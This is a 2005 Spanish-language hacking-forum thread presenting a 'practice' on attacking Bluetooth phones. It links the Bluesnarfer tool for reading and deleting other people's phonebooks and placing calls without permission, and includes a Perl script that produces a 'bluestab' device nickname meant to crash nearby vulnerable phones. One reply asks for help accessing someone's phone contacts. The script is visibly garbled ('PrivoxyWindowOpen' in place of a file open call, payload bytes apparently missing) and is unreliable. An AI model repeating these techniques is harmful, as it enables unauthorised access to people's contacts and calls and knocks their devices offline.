Foro de elhacker.net

Comunicaciones => Hacking Mobile => Mensaje iniciado por: - xXx - en 12 Julio 2005, 12:15 pm


Título: Práctica 1 - Acceder a agendas, borrarlas, hacer llamadas sin permiso, etc...
Publicado por: - xXx - en 12 Julio 2005, 12:15 pm
Bueno voy a hacer mi aportación personal al taller, como ya puse otras noticias y descargas ahora voy a seguir con otra práctica, rápida y simple.


PRIMERA PARTE

Lo que vamos a ver es cómo acceder a un teléfono movil con BT ( no todos los móviles son vulnerables). Como habréis leido en varias noticias, por ejemplo en la recopilación que hizo firos:

http://foro.elhacker.net/index.php/topic,77595.0.html

Se habla de bluesniffer, que con un portatil accediendo a un parlamento o senado no recuerdo bien, se hicieron con la agenda electrónica de muchos de los políticos, pues ahora os voy a mostrar cómo se hizo este ejercicio, bastante simple a pesar de parecer muy complicado.

Para ello necesitaremos un programa del mismo nombre blusnafer que podeis descargar aquí:

http://usuarios.lycos.es/wormzweb/modules.php?name=Downloads&d_op=viewdownloaddetails&lid=277&title=Bluesnarfer%200.1

Este pequeña utilidad permite por medio de comandos acceder a ciertos teléfonos móviles vulnerables, y conseguir ver un listado de las últimas llamadas, ver la agenda electronica, borrarla, hacer llamadas , etc... todo esto lo podéis ver en el siguiente video explicativo bastatne corto y muy demostrativo de lo simple que resulta hacer todo esto:

http://usuarios.lycos.es/wormzweb/modules.php?name=Downloads&d_op=viewdownloaddetails&lid=280&title=Video%20tutorial%20de%20blue%20snarfer

Podéis leer mas información sobre esto en el siguiente link:
http://usuarios.lycos.es/wormzweb/modules.php?name=News&file=article&sid=218


SEGUNDA PARTE

En esta segunda parte voy a mostrar algo bien simple, es una vulnerabilidad conocida como bluestab, (puñalada azul) la cual permite el reinicio de ciertos dispositivos vulnerables, para lo cual basta con cambiar el nick de tu dispositivo movil, esto es debido a usar una parte de código hexadecimal en el nick que provoca que ciertos teléfonos se bloquen y es reinicien automaticamente, esta vulnerabilidad es muy curiosa ya que simplemente con tener este nick, cuando alguien busque dispositivos BT y encuentre el tuyo, se reiniciará automaticamente sin saber el motivo. Para realizar esto basta con usar el siguiente programa que os creará un nick "xploit", que debereis copiar luego como nick.


Código:
nokia-bt-cx.pl

-------------start---------------

#!/usr/bin/perl -w



my $btnick;

my $bth;

my $bts;

my $file;

$bth = " .";

print "\n********************** ************************************************** **************************** ************\n

";

print "****************** Reinicio de dispositivos vulnerables por medio de nombre en dispositivo BT ********************\n";

print "** mas información sobre su uso en http://usuarios.lycos.es/wormzweb/modules.php?name=News&file=article&sid=217 **\n";

print "*****************                                [::wormz::] www.wormzweb.tk                      *****************\n";

print "************************* ****************************** ****************************** ******************************\n";



print " \n Escribe tu nick : ";

$btnick = <STDIN>;

chomp($btnick);

print " \n OUTPUT : ";

$file = <STDIN>;

chomp($file);

PrivoxyWindowOpen(BLUEN, ">>$file") || die "No se ha podido crear el archivo $!\n";

$bts = "$btnick$bth";

print BLUEN ("$bts");

close(BLUEN);



print "\n ¡Finalizado! , Envia el texto a tu teléfono y copialo en el nombre de tu telefono BT \n\n";

-------------end-----------------

Bueno como he dicho este programilla os creará un fichero que debeis enviar a vuestro movil y copiarlo en el nick.

Podéis leer mas información sobre esto en el siguiente link:
http://usuarios.lycos.es/wormzweb/modules.php?name=News&file=article&sid=218


TERCERA PARTE:

Bueno, siento no ser mas comleto en todo esto pero estoy aún bastante liado, espero que en unos dias tener mas tiempo y poder ser mas específico y explicar todo mas en profundidad para los que le gusta la teoría, también para los que les gusta juguetear con pequeñas aplicaciones les recomiendo que vean la noticia que puse en mi web sobre hack BT, en la que hay unas pequeñas aplicaciones para descargar muy simples, que por lo general son escaneadores con diferentes utilidades y bastante interesantes.

http://usuarios.lycos.es/wormzweb/modules.php?name=News&file=article&sid=218

Espero haber servido de ayuda en el taller y que sea una aportación mas al taller BT.

Un saludo xXx

Título: Re: Práctica 1 - Acceder a agendas, borrarlas, hacer llamadas sin permiso, etc...
Publicado por: Gospel en 12 Julio 2005, 19:11 pm
Oye, muchísimas gracias por la aportación! Pero podrías subir la información a otro repositorio en el q no haga falta estar registrado para descargarse los contenidos?? Lo digo pq al intentar acceder a los links de wormzweb te dice "acceso denegado", y es necesario estar registrado...

Gracias de nuevo.

Salu2

Título: Re: Práctica 1 - Acceder a agendas, borrarlas, hacer llamadas sin permiso, etc...
Publicado por: arranxam en 4 Septiembre 2005, 13:12 pm
necesito tener acceso  a los archivos de un telefono movil, pero no tengo suficientes conocimientos para ello, me podria explicar por donde empezar . necesitaria ver la agenda de voz y la agenda de direcciones de internet, gracias anticipadas

Título: Re: Práctica 1 - Acceder a agendas, borrarlas, hacer llamadas sin permiso, etc...
Publicado por: Firos en 5 Septiembre 2005, 13:02 pm
Pues creo que esas cosas en concreto estan en proceso todavia. De todas formas toda la información esta en las prácticas que tienen chincheta (o en la web).

Simplemente tienes que leertelos... ahí esta todo lo que te hace falta. No se si se podría hacer a través de los comandos AT (que ya se explican en una de las chinchetas).

Puedes leertelos y si tienes alguna duda pregunta más concretamente ya que esto seria hacer un tutorial. Que ya habrá tiempo para hacerlos ;)


Un saludo.

Título: Re: Práctica 1 - Acceder a agendas, borrarlas, hacer llamadas sin permiso, etc..
Publicado por: Kasswed en 5 Septiembre 2005, 15:43 pm
Ta complicao esto del BlueTooh... lei el primer capitulo y por poco si me desmayo... yo creo k es mas bien para gente experta...

Saludos!

Título: Re: Práctica 1 - Acceder a agendas, borrarlas, hacer llamadas sin permiso, etc..
Publicado por: Jec en 5 Septiembre 2005, 21:35 pm
Cita de: kasswed en  5 Septiembre 2005, 15:43 pm
Ta complicao esto del BlueTooh... lei el primer capitulo y por poco si me desmayo... yo creo k es mas bien para gente experta...

Saludos!
pues te equivocas, desde hace un par de dias me estado dia y niche investigando todo lo del bluetooth porque estoy redactando un articulo, antecedentes, seguridad, etc, etc...
y es cuestion de meterle ganas, no soy ningun experto y he avanzado bastante en el tema
un saludo

Título: Re: Práctica 1 - Acceder a agendas, borrarlas, hacer llamadas sin permiso, etc..
Publicado por: Jec en 5 Septiembre 2005, 21:37 pm
Porcierto si alguien quiere el video se lo puede descargar de http://www.crimemachine.com/Tuts/Video/bluesnarfer.avi

un saludo

Título: Re: Práctica 1 - Acceder a agendas, borrarlas, hacer llamadas sin permiso, etc...
Publicado por: Gospel en 7 Septiembre 2005, 22:17 pm
Oye JEC, ese video no lo conocía yo. Es del Defcon group in the 530. Me ha gustado mucho y si no te importa lo subiremos a la sección de Downloads de la página de Bluehack.

Sobre lo q estás haciendo estos días, si avanzas en algo y nos quieres contar, aquí estamos... :)

Salu2 y gracias por el video.


Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines